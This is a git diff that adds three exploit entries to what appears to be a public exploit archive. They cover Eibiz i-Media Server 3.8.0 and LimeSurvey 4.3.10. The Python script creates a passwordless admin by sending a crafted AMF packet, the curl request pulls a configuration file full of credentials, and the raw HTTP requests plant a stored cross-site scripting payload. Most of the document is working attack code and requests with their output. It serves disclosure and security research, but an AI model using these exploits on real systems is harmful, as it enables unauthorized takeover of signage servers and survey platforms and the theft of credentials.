diff --git a/exploits/hardware/webapps/48763.txt b/exploits/hardware/webapps/48763.txt
new file mode 100644
index 000000000..db3978f84
--- /dev/null
+++ b/exploits/hardware/webapps/48763.txt
@@ -0,0 +1,269 @@
+# Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass
+# Date: 2020-08-21
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.eibiz.co.th
+# Version: <=3.8.0
+# CVE: N/A
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+#
+#
+# Eibiz i-Media Server Digital Signage 3.8.0 (createUser) Authentication Bypass (Add Admin)
+#
+#
+# Vendor: EIBIZ Co.,Ltd.
+# Product web page: http://www.eibiz.co.th
+# Affected version: <=3.8.0
+#
+# Summary: EIBIZ develop advertising platform for out of home media in that
+# time the world called "Digital Signage". Because most business customers
+# still need get outside to get in touch which products and services. Online
+# media alone cannot serve them right place, right time.
+#
+# Desc: The application suffers from unauthenticated privilege escalation and
+# arbitrary user creation vulnerability that allows authentication bypass.
+# Once serialized, an AMF encoded object graph may be used to persist and retrieve
+# application state or allow two endpoints to communicate through the exchange
+# of strongly typed data. These objects are received by the server without validation
+# and authentication and gives the attacker the ability to create any user with
+# any role and bypass the security control in place and modify presented data on
+# the screen/billboard.
+#
+# =========================================================================================
+#
+# # python3 imedia_createUser.py 192.168.1.1 waddup
+#
+# --Sending serialized object...
+# --Replaying...
+#
+# ------------------------------------------------------
+# Admin user 'waddup' successfully created. No password.
+# ------------------------------------------------------
+#
+# =========================================================================================
+#
+# Tested on: Windows Server 2016
+# Windows Server 2012 R2
+# Windows Server 2008 R2
+# Apache Flex
+# Apache Tomcat/6.0.14
+# Apache-Coyote/1.1
+# BlazeDS Application
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2020-5586
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5586.php
+#
+#
+# 26.07.2020
+#
+#
+
+import time as go
+import requests
+import sys
+import re
+
+class __CreateAdmin__:
+
+ def __init__(self):
+ self.ep = "/messagebroker/amf"
+ self.agent = "CharlieChaplin"
+ self.amfpacket = None
+ self.bytecount = None
+ self.bytesdata = None
+ self.address = None
+ self.headers = None
+ self.usrname = None
+ self.ende = None
+
+ def usage(self):
+ if len(sys.argv) != 3:
+ self.me()
+ msg = "\x20i-Media Server Digital Signage 3.8.0 Auth Bypass/Add Admin"
+ brd = "-" * len(msg + "\x20")
+ print("\n" + brd)
+ print(msg)
+ print("\x20Usage: ./i-media.py [ip] [username]")
+ print(brd)
+ exit(12)
+ else:
+ self.address = sys.argv[1]
+ self.usrname = sys.argv[2]
+ if not "http" in self.address:
+ self.address = "http://{}".format(self.address)
+
+ def amf(self):
+ self.headers = {"User-Agent" : self.agent,
+ "Accept" : "*/*",
+ "Accept-Language" : "en-US,en;q=0.5",
+ "Accept-Encoding" : "gzip, deflate",
+ "Origin" : self.address,
+ "Connection" : "close",
+ "Referer" : self.address + "/main.swf",
+ "Content-Type" : "application/x-amf"}
+
+ self.amfpacket = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E"
+ self.amfpacket += b"\x75\x6C\x6C\x00\x03\x2F\x33\x36\x00"
+ self.amfpacket += b"\x00\x01\xB3\x0A\x00\x00\x00\x01\x11"
+ self.amfpacket += b"\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E"
+ self.amfpacket += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67"
+ self.amfpacket += b"\x2E\x6D\x65\x73\x73\x61\x67\x65\x73"
+ self.amfpacket += b"\x2E\x52\x65\x6D\x6F\x74\x69\x6E\x67"
+ self.amfpacket += b"\x4D\x65\x73\x73\x61\x67\x65\x0D\x73"
+ self.amfpacket += b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65"
+ self.amfpacket += b"\x72\x61\x74\x69\x6F\x6E\x13\x74\x69"
+ self.amfpacket += b"\x6D\x65\x73\x74\x61\x6D\x70\x09\x62"
+ self.amfpacket += b"\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E"
+ self.amfpacket += b"\x74\x49\x64\x0F\x68\x65\x61\x64\x65"
+ self.amfpacket += b"\x72\x73\x15\x74\x69\x6D\x65\x54\x6F"
+ self.amfpacket += b"\x4C\x69\x76\x65\x17\x64\x65\x73\x74"
+ self.amfpacket += b"\x69\x6E\x61\x74\x69\x6F\x6E\x13\x6D"
+ self.amfpacket += b"\x65\x73\x73\x61\x67\x65\x49\x64\x01"
+ self.amfpacket += b"\x06\x15\x63\x72\x65\x61\x74\x65\x55"
+ self.amfpacket += b"\x73\x65\x72\x04\x00\x09\x03\x01\x0A"
+ self.amfpacket += b"\x81\x73\x1B\x64\x73\x2E\x6D\x6F\x64"
+ self.amfpacket += b"\x65\x6C\x2E\x55\x73\x65\x72\x11\x70"
+ self.amfpacket += b"\x61\x73\x73\x77\x6F\x72\x64\x0D\x63"
+ self.amfpacket += b"\x72\x65\x61\x74\x65\x07\x74\x65\x6C"
+ self.amfpacket += b"\x07\x66\x61\x78\x09\x6E\x61\x6D\x65"
+ self.amfpacket += b"\x0F\x61\x64\x64\x72\x65\x73\x73\x0D"
+ self.amfpacket += b"\x75\x70\x64\x61\x74\x65\x05\x69\x64"
+ self.amfpacket += b"\x0D\x6D\x6F\x62\x69\x6C\x65\x0F\x75"
+ self.amfpacket += b"\x44\x65\x6C\x65\x74\x65\x15\x64\x65"
+ self.amfpacket += b"\x70\x61\x72\x74\x6D\x65\x6E\x74\x09"
+ self.amfpacket += b"\x72\x6F\x6C\x65\x09\x72\x65\x61\x64"
+ self.amfpacket += b"\x0B\x65\x6D\x61\x69\x6C\x0F\x63\x6F"
+ self.amfpacket += b"\x6D\x70\x61\x6E\x79\x06\x01\x03\x06"
+ self.amfpacket += b"\x01\x06\x01\x06" ##################"
+ self.bytecount = len(self.usrname * 2) + 1
+ self.bytesdata = [self.bytecount]
+ self.amfpacket += "".join(map(chr, self.bytesdata))
+ self.amfpacket += (bytes(self.usrname.encode("utf-8")))
+ self.amfpacket += b"\x06\x01\x03\x06\x36\x06\x01\x03\x06"
+ self.amfpacket += b"\x01\x06\x1B\x41\x64\x6D\x69\x6E\x69"
+ self.amfpacket += b"\x73\x74\x72\x61\x74\x6F\x72\x03\x06"
+ self.amfpacket += 
b"\x01\x06\x01\x01\x0A\x0B\x01\x15\x44" + self.amfpacket += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74" + self.amfpacket += b"\x06\x0D\x6D\x79\x2D\x61\x6D\x66\x09" + self.amfpacket += b"\x44\x53\x49\x64\x06\x49\x39\x36\x42" + self.amfpacket += b"\x30\x42\x46\x38\x43\x2D\x41\x31\x31" + self.amfpacket += b"\x41\x2D\x38\x41\x32\x34\x2D\x38\x31" + self.amfpacket += b"\x43\x31\x2D\x35\x38\x37\x45\x41\x33" + self.amfpacket += b"\x41\x43\x41\x33\x38\x43\x01\x04\x00" + self.amfpacket += b"\x06\x17\x75\x73\x65\x72\x53\x65\x72" + self.amfpacket += b"\x76\x69\x63\x65\x06\x49\x39\x39\x46" + self.amfpacket += b"\x45\x43\x43\x46\x39\x2D\x34\x41\x38" + self.amfpacket += b"\x44\x2D\x46\x46\x34\x31\x2D\x31\x41" + self.amfpacket += b"\x36\x36\x2D\x42\x46\x39\x31\x32\x45" + self.amfpacket += b"\x42\x42\x44\x36\x35\x36" ##########" + + print("\n--Sending serialized object...") + req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket) + #print(req.text.encode("utf-8")) + go.sleep(2) + print("--Replaying...") + req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket) + #print(req.text.encode("utf-8")) + self.ende = "Admin user '" + self.usrname + "' successfully created. No password." + print + print("-" * len(self.ende)) + print(self.ende) + print("-" * len(self.ende)) + + def me(self): + cc = """ + + /`,.,,,. + :.......,, + ,.........7 + ,.........$ + ......:=+=$ + I.....,,:~,.: + $.?7IZDDNNN~. + $$: 8D=:I D, + D~,7NI7DNN + DDD NNN: + D8.ININ; + D8?7DZS + .ZDNNND D + S..,.~8?,N OO77 + N......,..$=77:+?=~8 + :......,::=.I8?:+=.=+~++ + =.......,:+$=+O:+==~~++++= + 8...........~7D$::~..~====:++ + I.............:+.....~~~=~:~+? + N,............. .+...,:~=+~~ :+=$ + ;....... ......, .,....,:=+:,..~=? + Z,,...... :............,::~~=...===I + =.......$ Z...... =~,,,,.,:~,...,7~= + +....... 8.....,.=~~~:.~~~=:~ ..:$== + ,...... +,..,,:.=~:~+I:,+I=8:...=?~ + ,....., =...,,,8+=,:~=~I=~~ N...:+? + ,.,.,.8 ,..,.,?DN~+~:=+::?D ..:=? 
+ 8...... ,...7=Z$DN:?::=I~~$ =..,=+ + ...,..D ,....O88D,8D,:=:==+?? ...,:7 + ,....7 ,..:$Z8D8=8DZ~~=~+==? :..:~+ + ......8D .. .... :?~8D:.:~~=++ ..,~II + :....~D+: . . . ..,..==~===N +,.,=$ + ,. DDND.......... .,...,===+=N ..,+?Z + DD 88 .......... ....,..~+=~N ..,~?I + ....... ,,.,,.:...=?? 8..~=I$ + ....... ...,,,,. ,:~= ..:=~? + ........ ,.,,..,:.. I.:+?+D + ....... .......,:,,8 ,..IN + ........ .,.. ..,,:.: :8N + ........ ... ..,::,, I+O + ........ ......,:,. O.ZN + ........ . . ...,,,,. D+ + ............ ....,,,. = + ....... . ....,,, ? + ....... .....,,, 7 + ...... . ..,,,, + + :..... ..,.,, 8 + :....... =. .....,,,N 8 + ~....... D. .....,,,D 8 + ~....... D. . ...,,,O D + =.... .....,,Z ?` + +...... . :........,.$ + + I...... ........,.7 = + Z........ . . ....,,7 D + N..... ... . ........I 8 + ..... ... , ........I 8 + ...... . = .. .....I 7 + :.. . ..7 8... .....I ? + Z.. D .. ....7 N NND88OOOOOOO88DN + O.. . .. ....O O D8OZ$77II777$$ZO8DN + ... . .. . .....N NNNNDDD+D888OOZ$7IIIIII7$ZO8DDN + .,. ....O O.. ..88OOZZ$$777~777IIIIIIIIIIIIIII77$Z8N + $.. ...88.. ..:ZZZZ$77IIII,IIIIIIIIII77777IIII7ZODN + ... ... ,7777IIIIIIII,IIIIII77$O88OZ7III7Z8N + Z.. ~7. . ,IIIIIIIIIIIII,IIII7$O8DN NDO$77$Z8N + =.. .. . 8. .IIIIIIIIIIIIII~I7$Z8DN NND88DDN + ... .?, I777IIIIIIIII7$~O8N NNNNN + 8.... .I. ...7IIIIII7$Z8DD NNNNN + NND=....~,=~ ...+I . . ..I$$ZO8DN NN NNNNN + N.+?~.~,=~=... ... $O.. . ...~:..=IINN $NNN + ?,:..:,.=N I.....,,=I+ N8 + ~....,8 + + """ + + j = 0 + while j < len(cc): + char = cc[j] + sys.stdout.write(char) + go.sleep(10.0 / 100000.0) + j = j + 1 + + def main(self): + self.usage() + self.amf() + +if __name__ == '__main__': + __CreateAdmin__().main() \ No newline at end of file diff --git a/exploits/hardware/webapps/48764.txt b/exploits/hardware/webapps/48764.txt new file mode 100644 index 000000000..71fea210a --- /dev/null +++ b/exploits/hardware/webapps/48764.txt 
@@ -0,0 +1,82 @@
+# Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure
+# Date: 2020-08-21
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.eibiz.co.th
+# Version: <=3.8.0
+# CVE: N/A
+
+Eibiz i-Media Server Digital Signage 3.8.0 Configuration Disclosure
+
+
+Vendor: EIBIZ Co.,Ltd.
+Product web page: http://www.eibiz.co.th
+Affected version: <=3.8.0
+
+Summary: EIBIZ develop advertising platform for out of home media in that
+time the world called "Digital Signage". Because most business customers
+still need get outside to get in touch which products and services. Online
+media alone cannot serve them right place, right time.
+
+Desc: i-Media Server is vulnerable to unauthenticated configuration disclosure
+when direct object reference is made to the SiteConfig.properties file using an
+HTTP GET method. This will enable the attacker to disclose sensitive information
+and help her in authentication bypass, privilege escalation and/or full system access.
+
+Tested on: Windows Server 2016
+ Windows Server 2012 R2
+ Windows Server 2008 R2
+ Apache Flex
+ Apache Tomcat/6.0.14
+ Apache-Coyote/1.1
+ BlazeDS Application
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2020-5583
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5583.php
+
+
+26.07.2020
+
+--
+
+
+$ curl http://192.168.1.1/config/SiteConfig.properties
+server.mode=testing
+admin.username=admin
+admin.password=admin
+designer.username=designer
+designer.password=designer
+reporter.username=reporter
+reporter.password=reporter
+db.PriDBServerIp=127.0.0.1
+db.PriDBServerPort=3306
+db.PriDBServerUser=root
+db.PriDBServerPwd=eibiz1234
+db.PriDBName=imediadb
+account.appId=1
+account.RootPath=C:/iMediaServWeb/tomcat/webapps/ROOT/
+account.ContentPath=C:/iMediaServWeb/tomcat/webapps/ROOT/
+account.imediasuitURL=http://localhost:8080/UserAPI/v1/user/applogin
+account.ReportInteractive=0
+account.ReportPlayer=1
+account.ReportMedia=1
+account.ReportTransfer=1
+ConcurrentDownload=10
+BindingAddress=192.168.1.1
+ServicePort=643
+EndPointPort=644
+AndroidServicePort=8080
+AndroidEndPointPort=8081
+RequireApprove=
+OutgoingMailServer=
+MailUser=
+MailPassword=
+mongodb.PriMongoDBName=imediadb_sandbox
+mongodb.PriMongoDBServerIp=localhost
+mongodb.PriMongoDBServerPort=27017
+mongodb.PriMongoDBUser=
+mongodb.PriMongoDBPwd=
\ No newline at end of file
diff --git a/exploits/php/webapps/48762.txt b/exploits/php/webapps/48762.txt
new file mode 100644
index 000000000..f3889249a
--- /dev/null
+++ b/exploits/php/webapps/48762.txt
@@ -0,0 +1,51 @@
+# Exploit Title: LimeSurvey 4.3.10 - 'Survey Menu' Persistent Cross-Site Scripting
+# Date: 2020-08-23
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://www.limesurvey.org
+# Version: LimeSurvey 4.3.10+200812
+# Tested on: Ubuntu 18.04.4
+# Patch Link: https://github.com/LimeSurvey/LimeSurvey/commit/3712854a8fd8d875c67640969a1d54c4d93d3676
+
+
+# Vulnerability Details
+Description : A stored cross-site scripting vulnerability exists within the "Survey Menu" functionality of the LimeSurvey administration panel.
+Vulnerable Parameters : Surveymenu[parent_id]
+
+
+# POC
+# Request 1 : Create a survey menu with the Surveymenu[title] parameter set to an XSS payload.
+
+POST /limesurvey/index.php/admin/menus/sa/update/id/ HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 524
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/limesurvey/index.php/admin/menus/sa/view
+Cookie: LS-MRZROBQAFECYWCMT=v1ac49ivhs7bb5ocb8sqc7oq51; YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D
+
+YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D&Surveymenu%5Bparent_id%5D=&Surveymenu%5Bsurvey_id%5D=&Surveymenu%5Buser_id%5D=&Surveymenu%5Bordering%5D=0&Surveymenu%5Bshowincollapse%5D=0&Surveymenu%5Bname%5D=realmenu&Surveymenu%5Btitle%5D=%3Csvg%2Fonload%3Dalert(1)%3E&Surveymenu%5Bdescription%5D=XSS+Test&Surveymenu%5Bposition%5D=side&Surveymenu%5Bchanged_by%5D=1&Surveymenu%5Bchanged_at%5D=2020-08-15+20%3A40%3A10&Surveymenu%5Bcreated_by%5D=1&Surveymenu%5Bid%5D=
+
+
+# Request 2 : Create a survey menu with the Surveymenu[parent_id] parameter set to the survey id from the previous request. The XSS payload will be triggered by this survey menu.
+
+POST /limesurvey/index.php/admin/menus/sa/update/id/ HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 505
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/limesurvey/index.php/admin/menus/sa/view
+Cookie: LS-MRZROBQAFECYWCMT=v1ac49ivhs7bb5ocb8sqc7oq51; YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D
+
+YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D&Surveymenu%5Bparent_id%5D=11&Surveymenu%5Bsurvey_id%5D=&Surveymenu%5Buser_id%5D=5&Surveymenu%5Bordering%5D=1&Surveymenu%5Bshowincollapse%5D=0&Surveymenu%5Bname%5D=xssmenu&Surveymenu%5Btitle%5D=XSS+Test&Surveymenu%5Bdescription%5D=XSS+Test&Surveymenu%5Bposition%5D=side&Surveymenu%5Bchanged_by%5D=1&Surveymenu%5Bchanged_at%5D=2020-08-15+20%3A42%3A58&Surveymenu%5Bcreated_by%5D=1&Surveymenu%5Bid%5D=
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 37d8723ee..f153ce595 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -43001,3 +43001,6 @@ id,file,description,date,author,type,platform,port
 48758,exploits/php/webapps/48758.txt,"Complaint Management System 1.0 - 'cid' SQL Injection",2020-08-21,"Mohamed Elobeid",webapps,php,
 48759,exploits/hardware/webapps/48759.txt,"Seowon SlC 130 Router - Remote Code Execution",2020-08-21,maj0rmil4d,webapps,hardware,
 48761,exploits/php/webapps/48761.rb,"vBulletin 5.1.2 < 5.1.9 - Unserialize Code Execution (Metasploit)",2017-07-24,Metasploit,webapps,php,
+48762,exploits/php/webapps/48762.txt,"LimeSurvey 4.3.10 - 'Survey Menu' Persistent Cross-Site Scripting",2020-08-24,"Matthew Aberegg",webapps,php,
+48763,exploits/hardware/webapps/48763.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass",2020-08-24,LiquidWorm,webapps,hardware,
+48764,exploits/hardware/webapps/48764.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure",2020-08-24,LiquidWorm,webapps,hardware,